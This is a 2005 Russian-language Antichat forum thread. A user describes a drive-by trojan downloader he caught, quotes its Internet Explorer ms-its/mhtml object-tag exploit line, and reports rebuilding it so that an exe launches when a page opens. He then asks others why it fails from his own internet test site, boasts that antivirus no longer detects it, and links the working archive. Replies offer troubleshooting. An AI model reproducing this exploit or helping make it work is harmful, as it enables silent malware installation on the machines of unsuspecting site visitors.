ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows

Ответ

Опции темы Поиск в этой теме Опции просмотра

Запуск exe прямо с сайта
Старый 11.12.2005, 00:18
vvs777
Познавший АНТИЧАТ
Провел на форуме:
1331503

Отправить сообщение для vvs777 с помощью ICQ Отправить сообщение для vvs777 с помощью AIM
Exclamation Запуск exe прямо с сайта

Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
(как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
Код:
<object data=  "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
В архиве лежит exe-шник и инф-файл, запускающий его.
Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
====
Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
Может, кто-то увидит, из-за чего?
Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.

Архив с этой байдой КАЧАТЬ ТУТ
PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.

Последний раз редактировалось vvs777; 11.12.2005 в 00:24.. Причина: Забыл файл.

Старый 23.12.2005, 01:16
vvs777
Познавший АНТИЧАТ
Провел на форуме:
1331503

Отправить сообщение для vvs777 с помощью ICQ Отправить сообщение для vvs777 с помощью AIM

Глухо. Может, не в тот раздел кинул?

кажется из-за!
Старый 23.12.2005, 08:18
Dread
Познающий
Провел на форуме:
226204

Отправить сообщение для Dread с помощью ICQ
По умолчанию кажется из-за!

Цитата:
Сообщение от vvs777  
Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
(как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
Код:
<object data=  "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
В архиве лежит exe-шник и инф-файл, запускающий его.
Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
====
Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
Может, кто-то увидит, из-за чего?
Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.

Архив с этой байдой КАЧАТЬ ТУТ
PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.
кажется из-за "file://" если его убрать на localhost'e то exe и тут не запустится!!!

Старый 23.12.2005, 17:16
nerezus
Pagan Heart
Провел на форуме:
6490435

Отправить сообщение для nerezus с помощью ICQ

теоретически никак

Старый 25.12.2005, 00:54
vvs777
Познавший АНТИЧАТ
Провел на форуме:
1331503

Не, я гарантирую что это должно работать. С того американского сервака этот вирусяка мне же приплыл когда-то? И file там вроде не должен быть...

Ответ